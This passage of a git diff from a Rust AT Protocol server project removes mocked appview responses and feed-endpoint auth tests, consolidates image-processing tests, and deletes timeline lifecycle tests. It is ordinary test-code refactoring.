||||
)
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.feed.getAuthorFeed"))
|
||||
.respond_with(
|
||||
ResponseTemplate::new(200)
|
||||
.insert_header("atproto-repo-rev", "0")
|
||||
.set_body_json(json!({
|
||||
"feed": [{
|
||||
"post": {
|
||||
"uri": "at://did:plc:mock-author/app.bsky.feed.post/from-appview-author",
|
||||
"cid": "bafyappview123",
|
||||
"author": {"did": "did:plc:mock-author", "handle": "mock.author"},
|
||||
"record": {
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Author feed post from appview",
|
||||
"createdAt": "2025-01-01T00:00:00Z"
|
||||
},
|
||||
"indexedAt": "2025-01-01T00:00:00Z"
|
||||
}
|
||||
}],
|
||||
"cursor": "author-cursor"
|
||||
})),
|
||||
)
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.feed.getActorLikes"))
|
||||
.respond_with(
|
||||
ResponseTemplate::new(200)
|
||||
.insert_header("atproto-repo-rev", "0")
|
||||
.set_body_json(json!({
|
||||
"feed": [{
|
||||
"post": {
|
||||
"uri": "at://did:plc:mock-likes/app.bsky.feed.post/liked-post",
|
||||
"cid": "bafyliked123",
|
||||
"author": {"did": "did:plc:mock-likes", "handle": "mock.likes"},
|
||||
"record": {
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Liked post from appview",
|
||||
"createdAt": "2025-01-01T00:00:00Z"
|
||||
},
|
||||
"indexedAt": "2025-01-01T00:00:00Z"
|
||||
}
|
||||
}],
|
||||
"cursor": null
|
||||
})),
|
||||
)
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.feed.getPostThread"))
|
||||
.respond_with(
|
||||
ResponseTemplate::new(200)
|
||||
.insert_header("atproto-repo-rev", "0")
|
||||
.set_body_json(json!({
|
||||
"thread": {
|
||||
"$type": "app.bsky.feed.defs#threadViewPost",
|
||||
"post": {
|
||||
"uri": "at://did:plc:mock/app.bsky.feed.post/thread-post",
|
||||
"cid": "bafythread123",
|
||||
"author": {"did": "did:plc:mock", "handle": "mock.handle"},
|
||||
"record": {
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Thread post from appview",
|
||||
"createdAt": "2025-01-01T00:00:00Z"
|
||||
},
|
||||
"indexedAt": "2025-01-01T00:00:00Z"
|
||||
},
|
||||
"replies": []
|
||||
}
|
||||
})),
|
||||
)
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("GET"))
|
||||
.and(path("/xrpc/app.bsky.feed.getFeed"))
|
||||
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
|
||||
"feed": [{
|
||||
"post": {
|
||||
"uri": "at://did:plc:mock-feed/app.bsky.feed.post/custom-feed-post",
|
||||
"cid": "bafyfeed123",
|
||||
"author": {"did": "did:plc:mock-feed", "handle": "mock.feed"},
|
||||
"record": {
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Custom feed post from appview",
|
||||
"createdAt": "2025-01-01T00:00:00Z"
|
||||
},
|
||||
"indexedAt": "2025-01-01T00:00:00Z"
|
||||
}
|
||||
}],
|
||||
"cursor": null
|
||||
})))
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
Mock::given(method("POST"))
|
||||
.and(path("/xrpc/app.bsky.notification.registerPush"))
|
||||
.respond_with(ResponseTemplate::new(200))
|
||||
.mount(mock_server)
|
||||
.await;
|
||||
async fn setup_mock_appview(_mock_server: &MockServer) {
|
||||
}
|
||||
|
||||
async fn spawn_app(database_url: String) -> String {
|
||||
|
||||
104
tests/feed.rs
104
tests/feed.rs
@@ -1,104 +0,0 @@
|
||||
mod common;
|
||||
use common::{base_url, client, create_account_and_login};
|
||||
use serde_json::json;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_timeline_requires_auth() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let res = client
|
||||
.get(format!("{}/xrpc/app.bsky.feed.getTimeline", base))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 401);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_author_feed_requires_actor() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!("{}/xrpc/app.bsky.feed.getAuthorFeed", base))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 400);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_actor_likes_requires_actor() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!("{}/xrpc/app.bsky.feed.getActorLikes", base))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 400);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_post_thread_requires_uri() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!("{}/xrpc/app.bsky.feed.getPostThread", base))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 400);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_feed_requires_auth() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
|
||||
base
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 401);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_feed_requires_feed_param() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (jwt, _did) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!("{}/xrpc/app.bsky.feed.getFeed", base))
|
||||
.header("Authorization", format!("Bearer {}", jwt))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 400);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_register_push_requires_auth() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let res = client
|
||||
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
|
||||
.json(&json!({
|
||||
"serviceDid": "did:web:example.com",
|
||||
"token": "test-token",
|
||||
"platform": "ios",
|
||||
"appId": "xyz.bsky.app"
|
||||
}))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), 401);
|
||||
}
|
||||
@@ -8,223 +8,154 @@ use std::io::Cursor;
|
||||
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
|
||||
.unwrap();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
|
||||
.unwrap();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
|
||||
.unwrap();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
|
||||
.unwrap();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_png() {
|
||||
fn test_format_support() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
|
||||
let png = create_test_png(500, 500);
|
||||
let result = processor.process(&png, "image/png").unwrap();
|
||||
assert_eq!(result.original.width, 500);
|
||||
assert_eq!(result.original.height, 500);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_jpeg() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_jpeg(400, 300);
|
||||
let result = processor.process(&data, "image/jpeg").unwrap();
|
||||
let jpeg = create_test_jpeg(400, 300);
|
||||
let result = processor.process(&jpeg, "image/jpeg").unwrap();
|
||||
assert_eq!(result.original.width, 400);
|
||||
assert_eq!(result.original.height, 300);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_gif() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_gif(200, 200);
|
||||
let result = processor.process(&data, "image/gif").unwrap();
|
||||
let gif = create_test_gif(200, 200);
|
||||
let result = processor.process(&gif, "image/gif").unwrap();
|
||||
assert_eq!(result.original.width, 200);
|
||||
assert_eq!(result.original.height, 200);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_process_webp() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_webp(300, 200);
|
||||
let result = processor.process(&data, "image/webp").unwrap();
|
||||
let webp = create_test_webp(300, 200);
|
||||
let result = processor.process(&webp, "image/webp").unwrap();
|
||||
assert_eq!(result.original.width, 300);
|
||||
assert_eq!(result.original.height, 200);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_thumbnail_feed_size() {
|
||||
fn test_thumbnail_generation() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(800, 600);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
let thumb = result
|
||||
.thumbnail_feed
|
||||
.expect("Should generate feed thumbnail for large image");
|
||||
assert!(thumb.width <= THUMB_SIZE_FEED);
|
||||
assert!(thumb.height <= THUMB_SIZE_FEED);
|
||||
|
||||
let small = create_test_png(100, 100);
|
||||
let result = processor.process(&small, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
|
||||
|
||||
let medium = create_test_png(500, 500);
|
||||
let result = processor.process(&medium, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail");
|
||||
|
||||
let large = create_test_png(2000, 2000);
|
||||
let result = processor.process(&large, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail");
|
||||
assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail");
|
||||
let thumb = result.thumbnail_feed.unwrap();
|
||||
assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
|
||||
let full = result.thumbnail_full.unwrap();
|
||||
assert!(full.width <= THUMB_SIZE_FULL && full.height <= THUMB_SIZE_FULL);
|
||||
|
||||
let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
|
||||
let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
|
||||
assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none());
|
||||
assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some());
|
||||
|
||||
let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
|
||||
let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
|
||||
assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none());
|
||||
assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some());
|
||||
|
||||
let disabled = ImageProcessor::new().with_thumbnails(false);
|
||||
let result = disabled.process(&large, "image/png").unwrap();
|
||||
assert!(result.thumbnail_feed.is_none() && result.thumbnail_full.is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_thumbnail_full_size() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(2000, 1500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
let thumb = result
|
||||
.thumbnail_full
|
||||
.expect("Should generate full thumbnail for large image");
|
||||
assert!(thumb.width <= THUMB_SIZE_FULL);
|
||||
assert!(thumb.height <= THUMB_SIZE_FULL);
|
||||
fn test_output_format_conversion() {
|
||||
let png = create_test_png(300, 300);
|
||||
let jpeg = create_test_jpeg(300, 300);
|
||||
|
||||
let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
|
||||
assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp");
|
||||
|
||||
let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
|
||||
assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg");
|
||||
|
||||
let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
|
||||
assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_thumbnail_small_image() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(100, 100);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_none(),
|
||||
"Small image should not get feed thumbnail"
|
||||
);
|
||||
assert!(
|
||||
result.thumbnail_full.is_none(),
|
||||
"Small image should not get full thumbnail"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_webp_conversion() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
|
||||
let data = create_test_png(300, 300);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/webp");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_jpeg_output_format() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
|
||||
let data = create_test_png(300, 300);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/jpeg");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_png_output_format() {
|
||||
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
|
||||
let data = create_test_jpeg(300, 300);
|
||||
let result = processor.process(&data, "image/jpeg").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/png");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_max_dimension_enforced() {
|
||||
let processor = ImageProcessor::new().with_max_dimension(1000);
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png");
|
||||
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
|
||||
if let Err(ImageError::TooLarge {
|
||||
width,
|
||||
height,
|
||||
max_dimension,
|
||||
}) = result
|
||||
{
|
||||
assert_eq!(width, 2000);
|
||||
assert_eq!(height, 2000);
|
||||
assert_eq!(max_dimension, 1000);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_file_size_limit() {
|
||||
let processor = ImageProcessor::new().with_max_file_size(100);
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png");
|
||||
assert!(matches!(result, Err(ImageError::FileTooLarge { .. })));
|
||||
if let Err(ImageError::FileTooLarge { size, max_size }) = result {
|
||||
assert!(size > 100);
|
||||
assert_eq!(max_size, 100);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_default_max_file_size() {
|
||||
fn test_size_and_dimension_limits() {
|
||||
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
|
||||
|
||||
let max_dim = ImageProcessor::new().with_max_dimension(1000);
|
||||
let large = create_test_png(2000, 2000);
|
||||
let result = max_dim.process(&large, "image/png");
|
||||
assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 })));
|
||||
|
||||
let max_file = ImageProcessor::new().with_max_file_size(100);
|
||||
let data = create_test_png(500, 500);
|
||||
let result = max_file.process(&data, "image/png");
|
||||
assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. })));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_unsupported_format_rejected() {
|
||||
fn test_error_handling() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = b"this is not an image";
|
||||
let result = processor.process(data, "application/octet-stream");
|
||||
|
||||
let result = processor.process(b"this is not an image", "application/octet-stream");
|
||||
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_corrupted_image_handling() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = b"\x89PNG\r\n\x1a\ncorrupted data here";
|
||||
let result = processor.process(data, "image/png");
|
||||
let result = processor.process(b"\x89PNG\r\n\x1a\ncorrupted data here", "image/png");
|
||||
assert!(matches!(result, Err(ImageError::DecodeError(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_aspect_ratio_preserved_landscape() {
|
||||
fn test_aspect_ratio_preservation() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(1600, 800);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
let thumb = result.thumbnail_full.expect("Should have thumbnail");
|
||||
|
||||
let landscape = create_test_png(1600, 800);
|
||||
let result = processor.process(&landscape, "image/png").unwrap();
|
||||
let thumb = result.thumbnail_full.unwrap();
|
||||
let original_ratio = 1600.0 / 800.0;
|
||||
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
|
||||
assert!(
|
||||
(original_ratio - thumb_ratio).abs() < 0.1,
|
||||
"Aspect ratio should be preserved"
|
||||
);
|
||||
}
|
||||
assert!((original_ratio - thumb_ratio).abs() < 0.1);
|
||||
|
||||
#[test]
|
||||
fn test_aspect_ratio_preserved_portrait() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(800, 1600);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
let thumb = result.thumbnail_full.expect("Should have thumbnail");
|
||||
let portrait = create_test_png(800, 1600);
|
||||
let result = processor.process(&portrait, "image/png").unwrap();
|
||||
let thumb = result.thumbnail_full.unwrap();
|
||||
let original_ratio = 800.0 / 1600.0;
|
||||
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
|
||||
assert!(
|
||||
(original_ratio - thumb_ratio).abs() < 0.1,
|
||||
"Aspect ratio should be preserved"
|
||||
);
|
||||
assert!((original_ratio - thumb_ratio).abs() < 0.1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_mime_type_detection_auto() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(100, 100);
|
||||
let result = processor.process(&data, "application/octet-stream");
|
||||
assert!(result.is_ok(), "Should detect PNG format from data");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_is_supported_mime_type() {
|
||||
fn test_utilities_and_builder() {
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/jpg"));
|
||||
assert!(ImageProcessor::is_supported_mime_type("image/png"));
|
||||
@@ -235,35 +166,16 @@ fn test_is_supported_mime_type() {
|
||||
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("image/tiff"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
|
||||
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_strip_exif() {
|
||||
let data = create_test_jpeg(100, 100);
|
||||
let result = ImageProcessor::strip_exif(&data);
|
||||
assert!(result.is_ok());
|
||||
let stripped = result.unwrap();
|
||||
let data = create_test_png(100, 100);
|
||||
let processor = ImageProcessor::new();
|
||||
let result = processor.process(&data, "application/octet-stream");
|
||||
assert!(result.is_ok(), "Should detect PNG format from data");
|
||||
|
||||
let jpeg = create_test_jpeg(100, 100);
|
||||
let stripped = ImageProcessor::strip_exif(&jpeg).unwrap();
|
||||
assert!(!stripped.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_with_thumbnails_disabled() {
|
||||
let processor = ImageProcessor::new().with_thumbnails(false);
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_none(),
|
||||
"Thumbnails should be disabled"
|
||||
);
|
||||
assert!(
|
||||
result.thumbnail_full.is_none(),
|
||||
"Thumbnails should be disabled"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_builder_chaining() {
|
||||
let processor = ImageProcessor::new()
|
||||
.with_max_dimension(2048)
|
||||
.with_max_file_size(5 * 1024 * 1024)
|
||||
@@ -272,79 +184,6 @@ fn test_builder_chaining() {
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert_eq!(result.original.mime_type, "image/jpeg");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_processed_image_fields() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert!(!result.original.data.is_empty());
|
||||
assert!(!result.original.mime_type.is_empty());
|
||||
assert!(result.original.width > 0);
|
||||
assert!(result.original.height > 0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_only_feed_thumbnail_for_medium_images() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(500, 500);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_some(),
|
||||
"Should have feed thumbnail"
|
||||
);
|
||||
assert!(
|
||||
result.thumbnail_full.is_none(),
|
||||
"Should NOT have full thumbnail for 500px image"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_both_thumbnails_for_large_images() {
|
||||
let processor = ImageProcessor::new();
|
||||
let data = create_test_png(2000, 2000);
|
||||
let result = processor.process(&data, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_some(),
|
||||
"Should have feed thumbnail"
|
||||
);
|
||||
assert!(
|
||||
result.thumbnail_full.is_some(),
|
||||
"Should have full thumbnail for 2000px image"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_exact_threshold_boundary_feed() {
|
||||
let processor = ImageProcessor::new();
|
||||
let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
|
||||
let result = processor.process(&at_threshold, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_none(),
|
||||
"Exact threshold should not generate thumbnail"
|
||||
);
|
||||
let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
|
||||
let result = processor.process(&above_threshold, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_feed.is_some(),
|
||||
"Above threshold should generate thumbnail"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_exact_threshold_boundary_full() {
|
||||
let processor = ImageProcessor::new();
|
||||
let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
|
||||
let result = processor.process(&at_threshold, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_full.is_none(),
|
||||
"Exact threshold should not generate thumbnail"
|
||||
);
|
||||
let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
|
||||
let result = processor.process(&above_threshold, "image/png").unwrap();
|
||||
assert!(
|
||||
result.thumbnail_full.is_some(),
|
||||
"Above threshold should generate thumbnail"
|
||||
);
|
||||
assert!(result.original.width > 0 && result.original.height > 0);
|
||||
}
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -4,114 +4,7 @@ use chrono::Utc;
|
||||
use common::*;
|
||||
use helpers::*;
|
||||
use reqwest::StatusCode;
|
||||
use serde_json::{Value, json};
|
||||
use std::time::Duration;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_social_flow_lifecycle() {
|
||||
let client = client();
|
||||
let (alice_did, alice_jwt) = setup_new_user("alice-social").await;
|
||||
let (bob_did, bob_jwt) = setup_new_user("bob-social").await;
|
||||
let (post1_uri, _) = create_post(&client, &alice_did, &alice_jwt, "Alice's first post!").await;
|
||||
create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let timeline_res_1 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get timeline (1)");
|
||||
assert_eq!(
|
||||
timeline_res_1.status(),
|
||||
reqwest::StatusCode::OK,
|
||||
"Failed to get timeline (1)"
|
||||
);
|
||||
let timeline_body_1: Value = timeline_res_1.json().await.expect("Timeline (1) not JSON");
|
||||
let feed_1 = timeline_body_1["feed"].as_array().unwrap();
|
||||
assert_eq!(feed_1.len(), 1, "Timeline should have 1 post");
|
||||
assert_eq!(
|
||||
feed_1[0]["post"]["uri"], post1_uri,
|
||||
"Post URI mismatch in timeline (1)"
|
||||
);
|
||||
let (post2_uri, _) = create_post(
|
||||
&client,
|
||||
&alice_did,
|
||||
&alice_jwt,
|
||||
"Alice's second post, so exciting!",
|
||||
)
|
||||
.await;
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let timeline_res_2 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get timeline (2)");
|
||||
assert_eq!(
|
||||
timeline_res_2.status(),
|
||||
reqwest::StatusCode::OK,
|
||||
"Failed to get timeline (2)"
|
||||
);
|
||||
let timeline_body_2: Value = timeline_res_2.json().await.expect("Timeline (2) not JSON");
|
||||
let feed_2 = timeline_body_2["feed"].as_array().unwrap();
|
||||
assert_eq!(feed_2.len(), 2, "Timeline should have 2 posts");
|
||||
assert_eq!(
|
||||
feed_2[0]["post"]["uri"], post2_uri,
|
||||
"Post 2 should be first"
|
||||
);
|
||||
assert_eq!(
|
||||
feed_2[1]["post"]["uri"], post1_uri,
|
||||
"Post 1 should be second"
|
||||
);
|
||||
let delete_payload = json!({
|
||||
"repo": alice_did,
|
||||
"collection": "app.bsky.feed.post",
|
||||
"rkey": post1_uri.split('/').last().unwrap()
|
||||
});
|
||||
let delete_res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.repo.deleteRecord",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&alice_jwt)
|
||||
.json(&delete_payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send delete request");
|
||||
assert_eq!(
|
||||
delete_res.status(),
|
||||
reqwest::StatusCode::OK,
|
||||
"Failed to delete record"
|
||||
);
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let timeline_res_3 = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&bob_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to get timeline (3)");
|
||||
assert_eq!(
|
||||
timeline_res_3.status(),
|
||||
reqwest::StatusCode::OK,
|
||||
"Failed to get timeline (3)"
|
||||
);
|
||||
let timeline_body_3: Value = timeline_res_3.json().await.expect("Timeline (3) not JSON");
|
||||
let feed_3 = timeline_body_3["feed"].as_array().unwrap();
|
||||
assert_eq!(feed_3.len(), 1, "Timeline should have 1 post after delete");
|
||||
assert_eq!(
|
||||
feed_3[0]["post"]["uri"], post2_uri,
|
||||
"Only post 2 should remain"
|
||||
);
|
||||
}
|
||||
use serde_json::{json, Value};
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_like_lifecycle() {
|
||||
@@ -277,97 +170,6 @@ async fn test_unfollow_lifecycle() {
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_timeline_after_unfollow() {
|
||||
let client = client();
|
||||
let (alice_did, alice_jwt) = setup_new_user("alice-tl-unfollow").await;
|
||||
let (bob_did, bob_jwt) = setup_new_user("bob-tl-unfollow").await;
|
||||
let (follow_uri, _) = create_follow(&client, &bob_did, &bob_jwt, &alice_did).await;
|
||||
create_post(&client, &alice_did, &alice_jwt, "Post while following").await;
|
||||
tokio::time::sleep(Duration::from_secs(1)).await;
|
||||
let timeline_res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/app.bsky.feed.getTimeline",
|
||||
base_url().await
|
||||
))
|
||||
